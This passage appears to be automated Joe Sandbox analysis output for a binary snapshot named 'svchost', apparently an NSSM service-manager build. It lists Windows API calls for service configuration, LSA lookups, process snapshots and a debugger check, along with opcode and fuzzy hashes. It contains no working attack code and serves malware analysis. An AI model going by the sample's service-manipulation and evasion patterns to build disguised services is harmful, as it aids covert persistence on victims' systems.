                                                    • Instruction Fuzzy Hash: 9AB09271000108BBCF212F26DC0A8893F2AEB803A1B108025F81809131DF76EEA29A8C

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 359 418b0c-418b2e HeapCreate 360 418b30-418b31 359->360 361 418b32-418b3b 359->361
                                                    APIs
                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00418B21
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CreateHeap
                                                    • String ID:
                                                    • API String ID: 10892065-0
                                                    • Opcode ID: d1f5c1f7ff6ca3e210c9ff08d4e84c7b89227a1fab85292e36c71b5e85367a71
                                                    • Instruction ID: 6fb3f13a5da9b15824ab22e1f0bcca622450086d227712405257e67a9503346b
                                                    • Opcode Fuzzy Hash: d1f5c1f7ff6ca3e210c9ff08d4e84c7b89227a1fab85292e36c71b5e85367a71
                                                    • Instruction Fuzzy Hash: 09D05E72B94304AADB109F75BD08B623BECD784396F00843AB90CC6150E678DA81DA08

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 362 413919-413925 call 4137ed 364 41392a-41392e 362->364
                                                    APIs
                                                    • _doexit.LIBCMT ref: 00413925
                                                      • Part of subcall function 004137ED: __lock.LIBCMT ref: 004137FB
                                                      • Part of subcall function 004137ED: __decode_pointer.LIBCMT ref: 00413832
                                                      • Part of subcall function 004137ED: __decode_pointer.LIBCMT ref: 00413847
                                                      • Part of subcall function 004137ED: __decode_pointer.LIBCMT ref: 00413871
                                                      • Part of subcall function 004137ED: __decode_pointer.LIBCMT ref: 00413887
                                                      • Part of subcall function 004137ED: __decode_pointer.LIBCMT ref: 00413894
                                                      • Part of subcall function 004137ED: __initterm.LIBCMT ref: 004138C3
                                                      • Part of subcall function 004137ED: __initterm.LIBCMT ref: 004138D3
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: __decode_pointer$__initterm$__lock_doexit
                                                    • String ID:
                                                    • API String ID: 1597249276-0
                                                    • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                    • Instruction ID: cd6012783e630caf1846ed7f46355f70d13e96bf156bd8dd16ed885f7af1e038
                                                    • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                    • Instruction Fuzzy Hash: ABB012B268030C37EA202947EC03F467F4D87C0B64F244071FA1C1D1E1A9A3BAA180CD
                                                    APIs
                                                    • OpenServiceW.ADVAPI32(?,?,?,?,00000000,00000000,77735E70), ref: 0040CAEF
                                                    • GetServiceDisplayNameW.ADVAPI32 ref: 0040CB17
                                                    • GetServiceKeyNameW.ADVAPI32(?,?,?,?), ref: 0040CB34
                                                    • GetLastError.KERNEL32 ref: 0040CB47
                                                    • GetLastError.KERNEL32 ref: 0040CB50
                                                    • EnumServicesStatusW.ADVAPI32 ref: 0040CB9D
                                                    • GetLastError.KERNEL32 ref: 0040CBA3
                                                    • GetProcessHeap.KERNEL32(00000000,0000003B), ref: 0040CBB7
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040CBBE
                                                    • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,00000000,00000003,?,0000003B,?), ref: 0040CC1A
                                                    • GetLastError.KERNEL32 ref: 0040CC2A
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040CC75
                                                    • HeapFree.KERNEL32(00000000), ref: 0040CC7C
                                                    • GetLastError.KERNEL32 ref: 0040CC82
                                                    • __snwprintf_s.LIBCMT ref: 0040CCB4
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 0040CCC3
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 0040CCCA
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 0040CCDF
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 0040CCE6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$ErrorLast$Process$FreeService$EnumNameServicesStatus$AllocDisplayOpen__snwprintf_s
                                                    • String ID: ENUM_SERVICE_STATUS$canonical_name$open_service()
                                                    • API String ID: 2597093351-3687008758
                                                    • Opcode ID: a873ba07c5b4005c15c99fbe001417df42881820b5864b2ce8b4ed45134739af
                                                    • Instruction ID: f503188999ee140625c6406a49f341195e14fe3366045b110030180a16826972
                                                    • Opcode Fuzzy Hash: a873ba07c5b4005c15c99fbe001417df42881820b5864b2ce8b4ed45134739af
                                                    • Instruction Fuzzy Hash: 51618AB1904301EBD710DB55DC85FAFB7E8EBD8704F104A2EF959A3280D778E9058B6A
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0040A1EA
                                                    • GetLastError.KERNEL32(00000000), ref: 0040A1F6
                                                      • Part of subcall function 004052C0: TlsGetValue.KERNEL32(00000000,?,00401042,00000000,00000000), ref: 004052C7
                                                      • Part of subcall function 004052C0: LocalAlloc.KERNEL32(00000040,0000FFFF,?,00401042,00000000,00000000), ref: 004052DA
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    • Thread32First.KERNEL32 ref: 0040A24E
                                                    • GetLastError.KERNEL32(00000000), ref: 0040A258
                                                    • CloseHandle.KERNEL32(00000000), ref: 0040A27D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$ErrorLastSource$AllocCloseCreateDeregisterFirstHandleLocalRegisterReportSnapshotThread32Toolhelp32Value
                                                    • String ID:
                                                    • API String ID: 414364297-0
                                                    • Opcode ID: 4638767dc103a9e6a31185ccdf1f383c447c27e4fd120cc99bc6f3ea7aaed1db
                                                    • Instruction ID: 89f48a4cf6a9a6b2169b356681f18064eeb06023b63748c5040493b97caa791b
                                                    • Opcode Fuzzy Hash: 4638767dc103a9e6a31185ccdf1f383c447c27e4fd120cc99bc6f3ea7aaed1db
                                                    • Instruction Fuzzy Hash: 9131B6B1504300AFD300EF659D45FAB77E8EF84318F84487EF549E3282E634E9158BAA
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 90058403c9df6f6ed3b87d35343112d852bc14fd61586e00f88080c2bcc3e524
                                                    • Instruction ID: f9580fb1e3cb4435e98f8377f0ae24c04a26ce3602f05662924e3990e25ac85f
                                                    • Opcode Fuzzy Hash: 90058403c9df6f6ed3b87d35343112d852bc14fd61586e00f88080c2bcc3e524
                                                    • Instruction Fuzzy Hash: 6F21F7F2A406087BE6207765BC4AFDB375CDB88319F00403AF609E5182E779E8454A68
                                                    APIs
                                                    • GetUserDefaultLangID.KERNEL32 ref: 00405601
                                                    • FindResourceExW.KERNEL32(00000000,00000005,?,?), ref: 00405616
                                                    • GetLastError.KERNEL32(?,?), ref: 0040561C
                                                    • FindResourceExW.KERNEL32(00000000,00000005,?,00000000,?,?), ref: 00405634
                                                    • LoadResource.KERNEL32(00000000,00000000,?,?), ref: 0040563D
                                                    • CreateDialogIndirectParamW.USER32(00000000,00000000,?,?,?), ref: 00405659
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Resource$Find$CreateDefaultDialogErrorIndirectLangLastLoadParamUser
                                                    • String ID:
                                                    • API String ID: 940021595-0
                                                    • Opcode ID: 72ef7efeecf6b696462b6b58e3e31324a3b31a326ada6146fcfc12930be8b8d8
                                                    • Instruction ID: e476e4ad9c0365e054dca9b840df72f2dc216dd3d76c2c72e3c00f538e0b4bad
                                                    • Opcode Fuzzy Hash: 72ef7efeecf6b696462b6b58e3e31324a3b31a326ada6146fcfc12930be8b8d8
                                                    • Instruction Fuzzy Hash: 24F09AB0708600BAE2505B64BC09FBB2768DBC4B12F408525F958D61C0EA78D8018E79
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 00416877
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041688C
                                                    • UnhandledExceptionFilter.KERNEL32(0041F0D8), ref: 00416897
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 004168B3
                                                    • TerminateProcess.KERNEL32(00000000), ref: 004168BA
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID:
                                                    • API String ID: 2579439406-0
                                                    • Opcode ID: f01314061c3818e20305920116d866878eb5042cc5ccecfbecbbfc2216c79b6f
                                                    • Instruction ID: 714c231b98a53905c4c0fced0f636a606c023e921e8ea544abea05735bda33fc
                                                    • Opcode Fuzzy Hash: f01314061c3818e20305920116d866878eb5042cc5ccecfbecbbfc2216c79b6f
                                                    • Instruction Fuzzy Hash: B921C5F5A01304AFCB31DF54E9456847BB8FB98302F90817AE51987360E7B89A868F4D
                                                    APIs
                                                    • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\ServiceGroupOrder,00000000,00020019,?), ref: 0040CEED
                                                    • GetLastError.KERNEL32 ref: 0040CEF7
                                                    • _fwprintf.LIBCMT ref: 0040CF1A
                                                      • Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
                                                      • Part of subcall function 00405470: LocalFree.KERNELBASE(00000000,?,?,?,00000000,00000000), ref: 00405498
                                                    • ChangeServiceConfigW.ADVAPI32(?,000000FF,000000FF,000000FF,00000000,00000000,00000000,0041E5D8,00000000,00000000,00000000,00000000,?,00000000,?), ref: 0040D225
                                                    • GetProcessHeap.KERNEL32(00000000,0041E5D8), ref: 0040D239
                                                    • HeapFree.KERNEL32(00000000), ref: 0040D240
                                                    • GetLastError.KERNEL32 ref: 0040D246
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040D27A
                                                    • HeapFree.KERNEL32(00000000), ref: 0040D283
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040D290
                                                    • HeapFree.KERNEL32(00000000), ref: 0040D293
                                                    • CloseServiceHandle.ADVAPI32(?), ref: 0040D29A
                                                    • _fwprintf.LIBCMT ref: 0040D2BD
                                                      • Part of subcall function 0040CA70: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,?,00401B82,?,?,?,00000001), ref: 0040CA7C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Free$Process$ErrorLastOpenService_fwprintf$ChangeCloseConfigHandleLocalManager_vfwprintf
                                                    • String ID: %s: %s$%s: %s$%s\%s: %s$List$SYSTEM\CurrentControlSet\Control\ServiceGroupOrder$groups$set_service_dependencies()
                                                    • API String ID: 1051873479-3133791794
                                                    • Opcode ID: 1472673ddb642fb760451205b66f8a7f14b720a8d27ed31555cebdbe2feeab61
                                                    • Instruction ID: 9c0a7fc0b1366e98588ba43337f49fd2028f4eb401c9540c82854c5db0497d9e
                                                    • Opcode Fuzzy Hash: 1472673ddb642fb760451205b66f8a7f14b720a8d27ed31555cebdbe2feeab61
                                                    • Instruction Fuzzy Hash: 41C1D8F1D04301ABD710ABA1DC4AFAB77A8EF44708F14452AF945A72C1F778E94487AE
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,00000001,?,00000000,?,?,00000000), ref: 004092B5
                                                    • GetLastError.KERNEL32(00000000), ref: 004092C3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CreateErrorFileLast
                                                    • String ID: AppStderr$AppStdout$STD_ERROR_HANDLE$STD_INPUT_HANDLE$STD_OUTPUT_HANDLE$stderr$stdin$stdout
                                                    • API String ID: 1214770103-1833172568
                                                    • Opcode ID: 616819472e838b286589a2bbe120a1ed2100ae1f041291cb188454517c6769bf
                                                    • Instruction ID: 6ae8fdd2871f227cf13b581f7b9c8d83ca64bc36ba86afe41948fee67ebde81e
                                                    • Opcode Fuzzy Hash: 616819472e838b286589a2bbe120a1ed2100ae1f041291cb188454517c6769bf
                                                    • Instruction Fuzzy Hash: 82E184F1940704ABD724DB75DC45FE773ACEB84308F40492EF65E93182E679A844CB69
                                                    APIs
                                                    • __wcsnicmp.LIBCMT ref: 0040111B
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00401150
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00401153
                                                    • GetComputerNameW.KERNEL32 ref: 00401185
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 004011B4
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004011B7
                                                    • LsaClose.ADVAPI32(?), ref: 004011F0
                                                    • LsaLookupNames.ADVAPI32(?,00000001,?,?,?), ref: 0040126B
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 00401275
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00401278
                                                    • LsaClose.ADVAPI32(?), ref: 0040128B
                                                    • LsaFreeMemory.ADVAPI32(?), ref: 00401299
                                                    • LsaFreeMemory.ADVAPI32(?), ref: 004012A3
                                                    • LsaNtStatusToWinError.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 004012A9
                                                      • Part of subcall function 00401000: LsaOpenPolicy.ADVAPI32(00000000,000F0FFF,000F0FFF,?), ref: 0040102D
                                                      • Part of subcall function 00401000: LsaNtStatusToWinError.ADVAPI32(00000000), ref: 00401037
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$AllocCloseErrorMemoryStatus$ComputerLookupNameNamesOpenPolicy__wcsnicmp
                                                    • String ID: %s\%s$SID$expanded$username_sid
                                                    • API String ID: 1950436716-179756375
                                                    • Opcode ID: 0f01d14120d1ec3f52388d2865ee54dcbcf4cc9dc7fddb09f4af5f8e8ba633f5
                                                    • Instruction ID: 8923221f29891c7587102ab13130cbc3c72cae1e0e7c2496b089627ed1adcca3
                                                    • Opcode Fuzzy Hash: 0f01d14120d1ec3f52388d2865ee54dcbcf4cc9dc7fddb09f4af5f8e8ba633f5
                                                    • Instruction Fuzzy Hash: 06D1D3B1A043016FD300EB65CD85EAFB3E9EF88308F44492EF545D7351EA78E9458B9A
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008), ref: 0041135B
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0041135E
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0041139B
                                                    • HeapFree.KERNEL32(00000000), ref: 0041139E
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 004113AB
                                                    • HeapFree.KERNEL32(00000000), ref: 004113AE
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00411430
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00411433
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00411470
                                                    • HeapFree.KERNEL32(00000000), ref: 00411473
                                                    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 004114E9
                                                    • HeapFree.KERNEL32(00000000), ref: 004114EC
                                                    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 004114F9
                                                    • HeapFree.KERNEL32(00000000), ref: 004114FC
                                                    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 00411509
                                                    • HeapFree.KERNEL32(00000000), ref: 0041150C
                                                    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 00411519
                                                    • HeapFree.KERNEL32(00000000), ref: 0041151C
                                                    • ChangeServiceConfigW.ADVAPI32(?,000000FF,000000FF,000000FF,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041153C
                                                    • GetLastError.KERNEL32 ref: 00411546
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00411576
                                                    • HeapFree.KERNEL32(00000000), ref: 0041157D
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00411596
                                                    • HeapFree.KERNEL32(00000000), ref: 0041159D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Alloc$ChangeConfigErrorLastService
                                                    • String ID: canon$dependencies$native_set_dependongroup
                                                    • API String ID: 1452945198-1240925597
                                                    • Opcode ID: 2bfb86973befa482fabe00d42bb3fe4171c406064511875981c350d78f657692
                                                    • Instruction ID: b18a58e69c4f32cef05835414142f752b3cd4a08407a03f402dfde9a93b034f2
                                                    • Opcode Fuzzy Hash: 2bfb86973befa482fabe00d42bb3fe4171c406064511875981c350d78f657692
                                                    • Instruction Fuzzy Hash: 829129B19043066BD710AF65CC84EEB73D8EF84354F444A2AFA55D3290E778ED84C7A9
                                                    APIs
                                                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 00408D89
                                                    • IsTextUnicode.ADVAPI32(?,?,00000000), ref: 00408E39
                                                    • CloseHandle.KERNEL32(?), ref: 00408EA4
                                                    • MoveFileW.KERNEL32(?,?), ref: 00408EB2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FileHandle$CloseInformationMoveTextUnicode
                                                    • String ID: MoveFile()
                                                    • API String ID: 2866973295-3582319293
                                                    • Opcode ID: 15708711689a8bb3d828d14e4bfab1ca7b6999520053ae95ba287ec52d9b1868
                                                    • Instruction ID: d8a2b6048f09d48243753343ed7bb43d63bee3e823a3270b0cadf41497ef1fc2
                                                    • Opcode Fuzzy Hash: 15708711689a8bb3d828d14e4bfab1ca7b6999520053ae95ba287ec52d9b1868
                                                    • Instruction Fuzzy Hash: CEB185B1604301AFD320DF65CD85E6BB7E9EFC8308F00492EF58693291DA74E945CB6A
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: _memset
                                                    • String ID: "%s" %s$%lu$D$NSSM$command line$start_service
                                                    • API String ID: 2102423945-3686305457
                                                    • Opcode ID: 15bd790cc5130b0d5c2ab7dfe92f44a3908f88334305f7af3615e792483eadc3
                                                    • Instruction ID: 8d8a3d24360daf10ba7eb9db1eca87cf74f697693d6f1518d53dda03d5ccb93b
                                                    • Opcode Fuzzy Hash: 15bd790cc5130b0d5c2ab7dfe92f44a3908f88334305f7af3615e792483eadc3
                                                    • Instruction Fuzzy Hash: BFC179F1A10700ABD720DB65DC46FDB73D8AB84308F40493EF69DA61C1E6BDA544CB69
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWindow
                                                    • String ID: %s$%s: %s$%s: %s: %s
                                                    • API String ID: 2863861424-3854535108
                                                    • Opcode ID: 62dbc4f8497a765d2b6207e4a47a89f7e005d1b09c3d01c80ec779e24176e9d2
                                                    • Instruction ID: 763075a4a37bd2d8825689e23daf19d261bde39fceb0a92dd0ece0a9df8372dc
                                                    • Opcode Fuzzy Hash: 62dbc4f8497a765d2b6207e4a47a89f7e005d1b09c3d01c80ec779e24176e9d2
                                                    • Instruction Fuzzy Hash: A981DBF6D04200BBE22077719C46BAF725C9B9431DF44093FF906A62C2FA7CD95946AB
                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 0040A5C0
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • __snwprintf_s.LIBCMT ref: 0040A5DE
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    • OpenProcess.KERNEL32(00100411,00000000,?), ref: 0040A610
                                                    • __snwprintf_s.LIBCMT ref: 0040A639
                                                    • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0040A67A
                                                    • GetLastError.KERNEL32(00000000), ref: 0040A699
                                                    • CloseHandle.KERNEL32(00000000), ref: 0040A6C2
                                                    • CloseHandle.KERNEL32(00000000), ref: 0040A6ED
                                                    • GetLastError.KERNEL32(00000000), ref: 0040A6F7
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040A723
                                                    • GetLastError.KERNEL32(00000000,00000002,00000000), ref: 0040A72F
                                                    • _memset.LIBCMT ref: 0040A760
